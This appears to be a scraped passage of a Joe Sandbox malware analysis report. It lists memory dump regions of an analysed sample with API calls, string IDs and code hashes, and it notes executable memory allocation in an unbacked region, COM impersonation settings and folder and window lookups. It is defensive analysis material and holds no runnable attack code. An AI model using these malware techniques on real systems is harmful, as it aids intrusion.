  (lpAddress = NULL, flAllocationType = 0x1000 MEM_COMMIT, flProtect = 0x40 PAGE_EXECUTE_READWRITE: the call commits memory that is writable and executable at once, and the call site itself lies in the 008C9000 region that the dump source below records as not backed by a PE image)
Memory Dump Source
• Source File: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8c9000_1A68.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 64d8edb99042e9ac42ccd224a50c858150061f730d794532ce3d7f45a935f748
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 7A113C79A00208EFDB01DF98C985E98BBF5EF08750F058094F9489B362D371EA50DF91
APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
  (rclsid read from 0043F68C inside the image, no aggregating outer object, dwClsContext = 1 CLSCTX_INPROC_SERVER, riid read from 0043F67C)
• SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
  (dwAuthnSvc = 0xA RPC_C_AUTHN_WINNT, dwAuthzSvc = 0 RPC_C_AUTHZ_NONE, no server principal name, dwAuthnLevel = 3 RPC_C_AUTHN_LEVEL_CALL, dwImpLevel = 3 RPC_C_IMP_LEVEL_IMPERSONATE, no explicit auth identity, dwCapabilities = 0 EOAC_NONE)
• SysAllocString.OLEAUT32(w!s#), ref: 004364FB
• SysAllocString.OLEAUT32(A3q5), ref: 004365A1
• VariantInit.OLEAUT32(?), ref: 00436613
• VariantClear.OLEAUT32(?), ref: 00436775
• SysFreeString.OLEAUT32(?), ref: 004367A0
• SysFreeString.OLEAUT32(?), ref: 004367A6
• SysFreeString.OLEAUT32(00000000), ref: 004367B3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2485776651-4124187736
• Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
• Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
• Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
• Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
• API String ID: 0-2246970021
• Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction ID: 57884115f73a545973cdd85e813ae28e768ac0b03b9150b708654ebc8ab184ab
• Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction Fuzzy Hash: E13242B0601B469FDB48CF26D580389BBB1FF45304F548698C9695FB5ADB35A8A2CFC0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4%$>V$>V$<>$EG$IK$UW$|~
• API String ID: 0-2246970021
• Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
• Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
• Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID:
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
APIs
• GetCurrentProcessId.KERNEL32 ref: 02498A1B
• GetCurrentThreadId.KERNEL32 ref: 02498A25
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
• GetForegroundWindow.USER32 ref: 02498AD7
• ExitProcess.KERNEL32 ref: 02498BD9
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                    • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                    • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                    • Instruction ID: 069069d79d43cb6cf4bea0452027827898fb68567307262ae85d267941b464e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AD117B56083018BD724DF25C8527ABB7F2EF92319F18996DE4828F3A4F7799401CB52
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction ID: f301dbb6ca1db81a006255d0263494cc57243c56ef61b29d79540b35bb951c58
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66A1D77510C3818EE365CF29C4D07ABBBD2AFD6304F188A6ED4D98B391DB748449C766
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction ID: 362284b3f6d56a0dbaff5ada9fcfbcea297e515e5218d39ffbb8955a1c9c2a62
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA1D77410C3818EE365CF29C4D07ABBBD2AFD6304F288A6ED4D98B391DB748549C766
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                    • API String ID: 0-923305466
                                                                                                                                                                                                                                                                    • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                    • Instruction ID: e34893e954f569520b003ed65eb6b2666269d71f9a66198bcfee89c3a565cd48
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CA1E67410C3818ED325CF29C4D07EBBBD6AFD2304F288A6ED4D98B291DB748449C762
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                    • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                    • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                    • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                    • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                    • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                    • API String ID: 0-483502859
                                                                                                                                                                                                                                                                    • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction ID: d40615f4737d9136a2fb5e2ea9650c8d22d56d4359be3b3524cf045ddf46b0bc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09A1A1B56017818FD728CF29C590A62BFF2EF96314B1995AEC4D68F766D734E802CB10
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                    • API String ID: 0-483502859
                                                                                                                                                                                                                                                                    • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                    • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                    • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                    • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                    • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                    • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                    • Instruction ID: 42d08a021de3f72c2cb7fa87eb591ac07f85e20f86aec561d7416a97d7d4ee9e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A081CE756007128FC728CF29C8A0A67B7F2FFA9710B19859DD8824FB65EB34E841CB55
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: Z\$^P
                                                                                                                                                                                                                                                                    • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                    • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                    • Instruction ID: 6ef4766a72a4222674f0c3935a1b9cb7306982faf8762867b4605a3192e60b05
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941C0B2911600CFC718CF28C9A2A62B7B2FF59314B1A859DD49B8F7A4E738E441CF55
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AzB$`rB
                                                                                                                                                                                                                                                                    • API String ID: 0-365317308
                                                                                                                                                                                                                                                                    • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                    • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AzB$`rB
                                                                                                                                                                                                                                                                    • API String ID: 0-365317308
                                                                                                                                                                                                                                                                    • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                    • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: c$
                                                                                                                                                                                                                                                                    • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                    • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                    • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
